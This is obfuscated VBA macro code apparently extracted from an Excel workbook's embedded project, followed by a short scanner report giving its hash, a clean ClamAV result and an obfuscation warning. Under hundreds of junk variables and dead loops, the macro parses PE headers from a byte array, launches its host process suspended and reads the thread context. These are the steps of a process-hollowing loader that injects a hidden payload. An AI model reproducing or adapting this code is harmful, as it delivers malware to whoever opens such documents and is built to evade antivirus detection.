bQEhFBGlKgmumwHrTEwEY = "qjPnHCbcLcTVVpGrVJpaO"
End If
End If
baFileContent = StrConv(strFileContent, vbFromUnicode)
FileToByteArray = baFileContent
End Function
Public Sub SnudjfdghskySbgaGcyaN(ByRef WBzIkfTMiJXPkVdFXWVcz() As Byte, YURScgiKJQzDIUKUuXait As String)
Dim structDOSHeader As IMAGE_DOS_HEADER
Dim quXRtMaNwiSNyNIHuUlts
quXRtMaNwiSNyNIHuUlts = 1618
Do Until quXRtMaNwiSNyNIHuUlts = 0
Dim UECorpMiWbCTJkJtigceo, LecLgchSOTwoxvPvDbxmF
UECorpMiWbCTJkJtigceo = "aqNavvbxvdQxOWgEIhQmB"
LecLgchSOTwoxvPvDbxmF = UECorpMiWbCTJkJtigceo
quXRtMaNwiSNyNIHuUlts = quXRtMaNwiSNyNIHuUlts - 1
Loop
Dim ptrDOSHeader As LongPtr: ptrDOSHeader = VarPtr(structDOSHeader)
Call RtlMoveMemory(ptrDOSHeader, VarPtr(WBzIkfTMiJXPkVdFXWVcz(0)), SIZEOF_IMAGE_DOS_HEADER)
Dim HLVrJJmzngwlkdbEmgfcs, tJIibTlRUirTcJibjRexD
HLVrJJmzngwlkdbEmgfcs = "TOCYnmOioeizABlmFohhf"
tJIibTlRUirTcJibjRexD = InStr(HLVrJJmzngwlkdbEmgfcs, "m")
If tJIibTlRUirTcJibjRexD = 0 Then
Dim bNVxsTnhTlPvQncmjIPaH, rWeqitSCcnbDNsVMJHYWJ
bNVxsTnhTlPvQncmjIPaH = "ElOTWDeDRImWLRryiECen"
rWeqitSCcnbDNsVMJHYWJ = True
Else
Dim bWBykwgNajnwVIPQgkAuD, RWORcTfzzaPdWqaCRWWMO, beMgRJfUCxyCfiYMFhBao
bWBykwgNajnwVIPQgkAuD = "atmpUcPlFqrYjoCNepHKD"
RWORcTfzzaPdWqaCRWWMO = "vvVCNJTMwIEcQERBEcBns"
beMgRJfUCxyCfiYMFhBao = InStr(Mid(bWBykwgNajnwVIPQgkAuD, 3, 2), Mid(bWBykwgNajnwVIPQgkAuD, 5, 2))
If beMgRJfUCxyCfiYMFhBao < 0 Then
Dim AjxtXrOoonDHOPSbKkkYD, VCqzQhbPlOuLzATpLSrpG
AjxtXrOoonDHOPSbKkkYD = 668
VCqzQhbPlOuLzATpLSrpG = AjxtXrOoonDHOPSbKkkYD - 1538
Else
Dim ojUUqsfKUWqaJDFgTgjNx
ojUUqsfKUWqaJDFgTgjNx = CurDir
End If
End If
If structDOSHeader.e_magic = IMAGE_DOS_SIGNATURE Then
If VERBOSE Then
Dim ssyPupJfBwWyWUzcOVWsK
ssyPupJfBwWyWUzcOVWsK = "ooYLXqRIWHsvEAOUfqRdK"
If Len(ssyPupJfBwWyWUzcOVWsK) < Len("i") Then
Dim BkRkfztxTbdEDhNhYiwKp, oEPKaEgWTjLJAPhGFoPpG
BkRkfztxTbdEDhNhYiwKp = 2296
oEPKaEgWTjLJAPhGFoPpG = 852
If BkRkfztxTbdEDhNhYiwKp = oEPKaEgWTjLJAPhGFoPpG Then
Dim GvTStNKTPNAHvmEbyfUmz, aQqTdqFztSGuIHjUQGPuc
GvTStNKTPNAHvmEbyfUmz = "PWniRMhBilLLYbegXVFxr"
aQqTdqFztSGuIHjUQGPuc = 4564
Else
Dim dvkceCBFgjTdgGDDXpxfu
dvkceCBFgjTdgGDDXpxfu = True
End If
Else
Dim vUTmMEvgGxfRwVvfRXNeT, mILrBaFrRrspHHzqPrWgy
vUTmMEvgGxfRwVvfRXNeT = "LVnJoFuRsLEejyqKCfDKh"
mILrBaFrRrspHHzqPrWgy = InStr(vUTmMEvgGxfRwVvfRXNeT, "e")
If mILrBaFrRrspHHzqPrWgy <= 0 Then
Dim yKNlJKhxgqIazjlhTkEPO
yKNlJKhxgqIazjlhTkEPO = Date
Else
Dim NgMBOoUObFPWvMXXgQpxT
NgMBOoUObFPWvMXXgQpxT = "NvGJEyKOgtmEtdbaxDhMI"
End If
End If
End If
Else
Exit Sub
End If
Dim OHxWwnFFcYkuutsSmpvvg
OHxWwnFFcYkuutsSmpvvg = 57
Do While OHxWwnFFcYkuutsSmpvvg > 0
Dim IvPoaCMDFWKuIVuVYaInE, iGfuQJJjMRrGQflHHwJRb
IvPoaCMDFWKuIVuVYaInE = "ohxojVgsqJJDbITvmHfJS"
iGfuQJJjMRrGQflHHwJRb = InStr(IvPoaCMDFWKuIVuVYaInE, "i")
If iGfuQJJjMRrGQflHHwJRb < 0 Then
Dim wcyYLxWVnpMhBAOJTiSdu, SetNQPjoqDXvCLDFuemLm
wcyYLxWVnpMhBAOJTiSdu = 3340
SetNQPjoqDXvCLDFuemLm = wcyYLxWVnpMhBAOJTiSdu
Else
Dim yCDypEvWNnPNFCXfkTGMH, VKNLXOleyeGqitBOpBlNr
yCDypEvWNnPNFCXfkTGMH = "cevmjMsprUcgemGPFFfyx"
VKNLXOleyeGqitBOpBlNr = Replace(yCDypEvWNnPNFCXfkTGMH, "r", "h")
End If
OHxWwnFFcYkuutsSmpvvg = OHxWwnFFcYkuutsSmpvvg - 1
Loop
Dim structNTHeaders As IMAGE_NT_HEADERS
Dim ptrNTHeaders As LongPtr: ptrNTHeaders = VarPtr(structNTHeaders)
Dim YojvjGpiDpbphfTsKpsiY, uQgoGUCGvracRrpGoOUTn, YjlQQeEGxUUIkEwcgCLMA
YojvjGpiDpbphfTsKpsiY = "hGViFAjkEYECQPLrOjRpj"
uQgoGUCGvracRrpGoOUTn = "jxxjvpUsvYqtvFebFFCoS"
YjlQQeEGxUUIkEwcgCLMA = InStr(Mid(YojvjGpiDpbphfTsKpsiY, 8, 6), Mid(YojvjGpiDpbphfTsKpsiY, 1, 6))
If YjlQQeEGxUUIkEwcgCLMA > 0 Then
Dim hWbnpNEKwAwnLuHUwPQWa, XwesGMREhmjgLRlkDApYU
hWbnpNEKwAwnLuHUwPQWa = 1561
XwesGMREhmjgLRlkDApYU = hWbnpNEKwAwnLuHUwPQWa
Else
Dim buyvyjOhJLUOAjAWUHaLg
buyvyjOhJLUOAjAWUHaLg = True
End If
Call RtlMoveMemory(ptrNTHeaders, VarPtr(WBzIkfTMiJXPkVdFXWVcz(structDOSHeader.e_lfanew)), SIZEOF_IMAGE_NT_HEADERS)
If structNTHeaders.Signature = IMAGE_NT_SIGNATURE Then
If VERBOSE Then
Dim QvmyqWywHIPMYPNTKwkvk
QvmyqWywHIPMYPNTKwkvk = 1334
Do Until QvmyqWywHIPMYPNTKwkvk = 0
Dim JpkUuIIWJYHdSyOvlVKtR, EfUtkxJKHYFbjhfbDVoOz
JpkUuIIWJYHdSyOvlVKtR = "nhYCvJSoAXeWbFWiDdwxA"
EfUtkxJKHYFbjhfbDVoOz = Replace(JpkUuIIWJYHdSyOvlVKtR, "b", "d")
QvmyqWywHIPMYPNTKwkvk = QvmyqWywHIPMYPNTKwkvk - 1
Loop
End If
Else
Exit Sub
End If
If VERBOSE Then
Dim QcVMcLdPnUJgGwXofQBdw, YxNBPgdnYRAVcSpMGEnrM
QcVMcLdPnUJgGwXofQBdw = 3465
For YxNBPgdnYRAVcSpMGEnrM = 1 To QcVMcLdPnUJgGwXofQBdw
Dim eKKGdGhwgsVcCQDikmFYC, odijEDIBxmnKIUMcUMyVQ, RzDSybLEvsHrkPHBwxdyT
eKKGdGhwgsVcCQDikmFYC = 831
odijEDIBxmnKIUMcUMyVQ = "IgqXyyAzbsfjoAkkYlcYc"
RzDSybLEvsHrkPHBwxdyT = eKKGdGhwgsVcCQDikmFYC
Next YxNBPgdnYRAVcSpMGEnrM
End If
#If Win64 Then
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_I386 Then
Exit Sub
End If
#Else
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_AMD64 Then
Exit Sub
End If
#End If
Dim strCurrentFilePath As String
strCurrentFilePath = Space(MAX_PATH)
Dim JlYRueMexnPLQHaQjphTF, FqnxqDcnbdOvySVRLOktN, QvYURyVwhBWESeULtezKQ
JlYRueMexnPLQHaQjphTF = "SVQgpygdLvCEqfBWWcTEt"
FqnxqDcnbdOvySVRLOktN = "yfezyovwVjtUBEfTygSBn"
QvYURyVwhBWESeULtezKQ = InStr(Mid(JlYRueMexnPLQHaQjphTF, 4, 8), Mid(JlYRueMexnPLQHaQjphTF, 4, 7))
If QvYURyVwhBWESeULtezKQ < 0 Then
Dim wjbqrOdYxAWzROTnCyfgP, SARPFObfsKJIWtmXDzJRx
wjbqrOdYxAWzROTnCyfgP = 580
SARPFObfsKJIWtmXDzJRx = (wjbqrOdYxAWzROTnCyfgP Mod 4)
Else
Dim JbaeboaxPEuDaCHizKYcS, fOmPUuGpYXuosjzQLEzbH
JbaeboaxPEuDaCHizKYcS = "ytfWfsABWFldWuPLFQjKG"
fOmPUuGpYXuosjzQLEzbH = InStr(JbaeboaxPEuDaCHizKYcS, "a")
If fOmPUuGpYXuosjzQLEzbH <= 0 Then
Dim BfofVQEOeNJPDElMnfTsi, QFapHtirNgzalCJXKXDcz
BfofVQEOeNJPDElMnfTsi = 3374
QFapHtirNgzalCJXKXDcz = BfofVQEOeNJPDElMnfTsi Mod 1652
Else
Dim TjJxNDnexyFHyKynOowvx, qHkOsbBNBhqqHVvpQTOTm
TjJxNDnexyFHyKynOowvx = True
qHkOsbBNBhqqHVvpQTOTm = "OliINzwcxUadfYLYBsVTU"
End If
End If
Dim lGetModuleFileName As Long
lGetModuleFileName = GetModuleFileName(0, strCurrentFilePath, MAX_PATH)
Dim JFsTPhymiVupEbUehMWpx
JFsTPhymiVupEbUehMWpx = 3244
Do Until JFsTPhymiVupEbUehMWpx = 0
Dim eQDBinNstmoTeGkuigPUv, snFJLuKekqIgLFNOsHTJS
eQDBinNstmoTeGkuigPUv = "TsLRkKVJgFcDBzIuCKpUr"
snFJLuKekqIgLFNOsHTJS = Replace(eQDBinNstmoTeGkuigPUv, "b", "d")
JFsTPhymiVupEbUehMWpx = JFsTPhymiVupEbUehMWpx - 1
Loop
strCurrentFilePath = Left(strCurrentFilePath, InStr(strCurrentFilePath, vbNullChar) - 1)
Dim strCmdLine As String
Dim zhYxCkRdRWlebIhkOpnTE
zhYxCkRdRWlebIhkOpnTE = 3496
Do While zhYxCkRdRWlebIhkOpnTE > 0
Dim WWOYGfHKtdCpDjLlsWbjC, MICuFxkemRSrDBkjxUejs
WWOYGfHKtdCpDjLlsWbjC = "uztKIXFhtcKCXQwRdniVF"
MICuFxkemRSrDBkjxUejs = InStr(WWOYGfHKtdCpDjLlsWbjC, "i")
If MICuFxkemRSrDBkjxUejs < 0 Then
Dim ySHOxyvXwrmKckomEaGxG, gkJWYHBbTcVYjoPTEiXOf
ySHOxyvXwrmKckomEaGxG = 569
gkJWYHBbTcVYjoPTEiXOf = ySHOxyvXwrmKckomEaGxG
Else
Dim PAGGArVWSTxLLrHXQxQSV, CppKRVxraRHHApJdqxpEe
PAGGArVWSTxLLrHXQxQSV = "NsbvFPyUlCDDzomaYvlJA"
CppKRVxraRHHApJdqxpEe = Replace(PAGGArVWSTxLLrHXQxQSV, "r", "h")
End If
zhYxCkRdRWlebIhkOpnTE = zhYxCkRdRWlebIhkOpnTE - 1
Loop
strCmdLine = strCurrentFilePath + " " + YURScgiKJQzDIUKUuXait
Dim strNull As String
Dim structProcessInformation As PROCESS_INFORMATION
Dim BjuStTIShBaAXsbqieoYO
BjuStTIShBaAXsbqieoYO = "xVhVMKhUinlqUIuxEScOd"
If Len(BjuStTIShBaAXsbqieoYO) < Len("i") Then
Dim FAtkPIfUhHffcQSMuOlxA, SRTEeWsVOwkbAVHbIDkCW
FAtkPIfUhHffcQSMuOlxA = 728
SRTEeWsVOwkbAVHbIDkCW = 2354
If FAtkPIfUhHffcQSMuOlxA = SRTEeWsVOwkbAVHbIDkCW Then
Dim aTTuUBhCNpdBoLHyELLMY, rkTeATkLKkaTCSXYkiuls
aTTuUBhCNpdBoLHyELLMY = "kcXTAYAnRAhQxuaqvmgAM"
rkTeATkLKkaTCSXYkiuls = 1277
Else
Dim ahhymjaBeQyPXHJYpuGVQ
ahhymjaBeQyPXHJYpuGVQ = True
End If
Else
Dim cecGKSIzuDqAGrcMEoKjj, GtBdElnYTMNoAXcfRAqqc
cecGKSIzuDqAGrcMEoKjj = "scxLvOUhzieIjmTjbmLFG"
GtBdElnYTMNoAXcfRAqqc = InStr(cecGKSIzuDqAGrcMEoKjj, "e")
If GtBdElnYTMNoAXcfRAqqc <= 0 Then
Dim JnhorqGmKgVLGuKACgHuz
JnhorqGmKgVLGuKACgHuz = Date
Else
Dim zPCmftaGMNuShWftOnUGM
zPCmftaGMNuShWftOnUGM = "qLdywnugjFUnpRYzifjFg"
End If
End If
Dim structStartupInfo As STARTUPINFO
If VERBOSE Then
Dim WEMHOLbXagkopHteLxzzU
WEMHOLbXagkopHteLxzzU = 3200
Do Until WEMHOLbXagkopHteLxzzU = 0
Dim hORoSragXCzXOVTJWrbRO, MFgTucRLVEWSPOOUtUubQ
hORoSragXCzXOVTJWrbRO = "QBSCrDotHVBjxEclWGFXr"
MFgTucRLVEWSPOOUtUubQ = hORoSragXCzXOVTJWrbRO
WEMHOLbXagkopHteLxzzU = WEMHOLbXagkopHteLxzzU - 1
Loop
End If
Dim lCreateProcess As Long
Dim hjfrkQUWGJrRJXMeyjlPn
hjfrkQUWGJrRJXMeyjlPn = "zKytOfyHgtjLuyoitbWBe"
If Len(hjfrkQUWGJrRJXMeyjlPn) < Len("i") Then
Dim WHwzOaaPvgrTdCkhYiUdQ, pfoAPNKLIIVnikBIRvQTg
WHwzOaaPvgrTdCkhYiUdQ = 2929
pfoAPNKLIIVnikBIRvQTg = 3562
If WHwzOaaPvgrTdCkhYiUdQ = pfoAPNKLIIVnikBIRvQTg Then
Dim kCYWFuCWybqLvHBhXYmpd, MxvGUsIxhMdjJeCpDjsiN
kCYWFuCWybqLvHBhXYmpd = "YhfOCvFQWKbuCTqsshzyk"
MxvGUsIxhMdjJeCpDjsiN = 1598
Else
Dim jGFALBYATvEEdxfDqKcSy
jGFALBYATvEEdxfDqKcSy = True
End If
Else
Dim rnmCLCYQuOShoDPOfiPIV, mqyEFFwKmxpooQstXYYaJ
rnmCLCYQuOShoDPOfiPIV = "JuFiYwgRxaGilADtDlIRQ"
mqyEFFwKmxpooQstXYYaJ = InStr(rnmCLCYQuOShoDPOfiPIV, "e")
If mqyEFFwKmxpooQstXYYaJ <= 0 Then
Dim zGKwNTpOkBmjBeWMWfVBg
zGKwNTpOkBmjBeWMWfVBg = Date
Else
Dim hqDRYLwvhjQHmMJMhRLhV
hqDRYLwvhjQHmMJMhRLhV = "jIhrQDXObSxdSpLyGDYzX"
End If
End If
lCreateProcess = CreateProcess(strNull, strCurrentFilePath + " " + YURScgiKJQzDIUKUuXait, 0&, 0&, False, CREATE_SUSPENDED, 0&, strNull, structStartupInfo, structProcessInformation)
If lCreateProcess = 0 Then
Exit Sub
Else
If VERBOSE Then
Dim dyclRynkWulYLhcPHLEXs
dyclRynkWulYLhcPHLEXs = "MMvFaScyCrphENhRscsuA"
If Len(dyclRynkWulYLhcPHLEXs) < Len("i") Then
Dim atImoNuwBHkHGctOWWeEY, YoKfDYwhdOPyGcftXDKRN
atImoNuwBHkHGctOWWeEY = 4602
YoKfDYwhdOPyGcftXDKRN = 353
If atImoNuwBHkHGctOWWeEY = YoKfDYwhdOPyGcftXDKRN Then
Dim uLbqffIbJOAstbeXhJNXo, xStiaYnuYttLkDBINyTMf
uLbqffIbJOAstbeXhJNXo = "oqnaPnkujeuzMmYbOgpOj"
xStiaYnuYttLkDBINyTMf = 498
Else
Dim tapfmbavQSVSzVSGifguF
tapfmbavQSVSzVSGifguF = True
End If
Else
Dim JvhFjwCoslTlieRecNWnY, izwRKGHcFtMrzIEhzcDxg
JvhFjwCoslTlieRecNWnY = "JutFCdDoCYCHDxvhFkFRe"
izwRKGHcFtMrzIEhzcDxg = InStr(JvhFjwCoslTlieRecNWnY, "e")
If izwRKGHcFtMrzIEhzcDxg <= 0 Then
Dim xHbHqQbBfqihFBUJNyOTl
xHbHqQbBfqihFBUJNyOTl = Date
Else
Dim MQhSIvnWCKsORKRvktOGA
MQhSIvnWCKsORKRvktOGA = "snTHQBiQCVdFrEVTunkFf"
End If
End If
End If
End If
Dim structContext As CONTEXT
structContext.ContextFlags = CONTEXT_INTEGER
Dim OlWBMpyCxYfiUtfHBpihi, QbOwhclbzTytHaeumctzv
OlWBMpyCxYfiUtfHBpihi = "kSgIxKDOCUJPSOHvMECFP"
QbOwhclbzTytHaeumctzv = InStr(OlWBMpyCxYfiUtfHBpihi, "m")
If QbOwhclbzTytHaeumctzv = 0 Then
Dim PJCFbsysJXKdCXjifFmmB, XfGNntampnNHLarlPfIMH
PJCFbsysJXKdCXjifFmmB = "rMQdnDeYnKnOCIOoEyQhD"
XfGNntampnNHLarlPfIMH = True
Else
Dim PVMpfbTmgwgnTREVRNYxf, tKWvPXRVpzDyShiSxhsfa, iPGuRhLpXrJpCvlPTpdcq
PVMpfbTmgwgnTREVRNYxf = "mWabBuLtTUWvNRfpEjhyO"
tKWvPXRVpzDyShiSxhsfa = "pjvaqgRhifKylfPPcLisF"
iPGuRhLpXrJpCvlPTpdcq = InStr(Mid(PVMpfbTmgwgnTREVRNYxf, 3, 2), Mid(PVMpfbTmgwgnTREVRNYxf, 5, 2))
If iPGuRhLpXrJpCvlPTpdcq < 0 Then
Dim QWCNbKvdtFFrflUpbXPfG, qhSjqKWdDRodIqReGPwqm
QWCNbKvdtFFrflUpbXPfG = 231
qhSjqKWdDRodIqReGPwqm = QWCNbKvdtFFrflUpbXPfG - 2915
Else
Dim ELdWwkpARqmVJAPIDKYxY
ELdWwkpARqmVJAPIDKYxY = CurDir
End If
End If
Dim lGetThreadContext As Long
#If Win64 Then
Dim baContext(0 To (LenB(structContext) - 1)) As Byte
Call RtlMoveMemory(VarPtr(baContext(0)), VarPtr(structContext), LenB(structContext))
Dim hVwdBSltmnrhaJcGBKoYc
hVwdBSltmnrhaJcGBKoYc = 3784
Do While hVwdBSltmnrhaJcGBKoYc > 0
Dim PLMwCDlmzghXkiQXPOWlv, jOThgMbtoFMUTrkJGYpah
PLMwCDlmzghXkiQXPOWlv = "nvTckuhsOtLuPlSAGCLAb"
jOThgMbtoFMUTrkJGYpah = InStr(PLMwCDlmzghXkiQXPOWlv, "i")
If jOThgMbtoFMUTrkJGYpah < 0 Then
Dim MgkjOBkHLUqMFFVRovPjR, kztcpPGoiPHlovHJXrkQL
MgkjOBkHLUqMFFVRovPjR = 1684
kztcpPGoiPHlovHJXrkQL = MgkjOBkHLUqMFFVRovPjR
Else
Dim CKvioKnQsDyQpBGPhyKDt, CfIBqjniqeErgHOWTbfsw
CKvioKnQsDyQpBGPhyKDt = "hYPbucfxRmOXLIapnpxjT"
CfIBqjniqeErgHOWTbfsw = Replace(CKvioKnQsDyQpBGPhyKDt, "r", "h")
End If
hVwdBSltmnrhaJcGBKoYc = hVwdBSltmnrhaJcGBKoYc - 1
Loop
lGetThreadContext = GetThreadContext(structProcessInformation.hThread, VarPtr(baContext(0)))
#Else
Dim vmKmxEkNtCmNuvkGGXtbR
vmKmxEkNtCmNuvkGGXtbR = 1168
Do While vmKmxEkNtCmNuvkGGXtbR > 0
Dim hYgknCqbmURkbrwyWPysD, ulzAytNCtEYSjomEckcSM
hYgknCqbmURkbrwyWPysD = "tXSbSQRznrYEMFWAaHcyS"
ulzAytNCtEYSjomEckcSM = InStr(hYgknCqbmURkbrwyWPysD, "i")
If ulzAytNCtEYSjomEckcSM < 0 Then
Dim gGuDtdNhIhUHoLNGINiBx, RpRrQdjTUFvzPnDfWfqau
gGuDtdNhIhUHoLNGINiBx = 861
RpRrQdjTUFvzPnDfWfqau = gGuDtdNhIhUHoLNGINiBx
Else
Dim JwekTByWsvSronrBlBYDn, NByiyyjBKHRBchRNgWBJV
JwekTByWsvSronrBlBYDn = "yjTQRmxFkVMSzirqloymf"
NByiyyjBKHRBchRNgWBJV = Replace(JwekTByWsvSronrBlBYDn, "r", "h")
End If
vmKmxEkNtCmNuvkGGXtbR = vmKmxEkNtCmNuvkGGXtbR - 1
Loop
lGetThreadContext = GetThreadContext(structProcessInformation.hThread, structContext)
#End If
If lGetThreadContext = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Dim cnMeHWaliFUUdWsIptOai, mnDPglsifXadvOdioYKDW
cnMeHWaliFUUdWsIptOai = "iAamCKDqvhVUEcvcpvGNa"
mnDPglsifXadvOdioYKDW = InStr(cnMeHWaliFUUdWsIptOai, "m")
If mnDPglsifXadvOdioYKDW = 0 Then
Dim bMjLzhiJjInTTOYinALGc, dHUQHiozbtevllzudGdky
bMjLzhiJjInTTOYinALGc = "OmfyNfEwTrlrUaWyWXYeB"
dHUQHiozbtevllzudGdky = True
Else
Dim VpMjBYeYbxXVTWfoURYSj, ioixHDyNjTIwDhshHgikA, YUfzrntfiNeroMaEKSvFk
VpMjBYeYbxXVTWfoURYSj = "fUlVieAyuzTvCsoTNNFYS"
ioixHDyNjTIwDhshHgikA = "BOJDIbxDrwGIyJqTBEadX"
YUfzrntfiNeroMaEKSvFk = InStr(Mid(VpMjBYeYbxXVTWfoURYSj, 3, 2), Mid(VpMjBYeYbxXVTWfoURYSj, 5, 2))
If YUfzrntfiNeroMaEKSvFk < 0 Then
Dim QDpypPMgmLPHIiscXqpeH, afDfptrCWmMEpirPabxFX
QDpypPMgmLPHIiscXqpeH = 979
afDfptrCWmMEpirPabxFX = QDpypPMgmLPHIiscXqpeH - 2816
Else
Dim VcnIFEHBMBgABQxKtavvD
VcnIFEHBMBgABQxKtavvD = CurDir
End If
End If
Exit Sub
Else
#If Win64 Then
Dim dRLuuVqGMCfNvaEIghroP
dRLuuVqGMCfNvaEIghroP = 2405
Do Until dRLuuVqGMCfNvaEIghroP = 0
Dim nowzfQwjbKuyraUEyIIJt, xQAONEHVzhxWyODoUpfTx
nowzfQwjbKuyraUEyIIJt = "ddsaamXpQxJedpwINIajK"
xQAONEHVzhxWyODoUpfTx = Replace(nowzfQwjbKuyraUEyIIJt, "b", "d")
dRLuuVqGMCfNvaEIghroP = dRLuuVqGMCfNvaEIghroP - 1
Loop
Call RtlMoveMemory(VarPtr(structContext), VarPtr(baContext(0)), LenB(structContext))
#End If
If VERBOSE Then
Dim ztEEtEhRMLseNALbwgQmr, VsvDooBHpayvWcrxhgkwl, YOtyNvWmElubwDajbeqFk
ztEEtEhRMLseNALbwgQmr = "eYJdHyHEvPwVJqmNnACWA"
VsvDooBHpayvWcrxhgkwl = "SkrpCsDOVLYPAJEWRRHOs"
YOtyNvWmElubwDajbeqFk = InStr(Mid(ztEEtEhRMLseNALbwgQmr, 4, 8), Mid(ztEEtEhRMLseNALbwgQmr, 4, 7))
…
vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 248320 bytes
SHA-256: cb34daf4018c1bfcd92682416b6f1be532d8c1dfdb117b1f9d72026d3c389cc5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
2627 of 3906 identifiers look randomly generated (e.g. 'MiwiESwiMS4cCQEEAjEWLhInJQ8JFywGNywfMS8D') — consistent with name-mangling obfuscation. Carved artifact contains 30 long base64-like blob(s).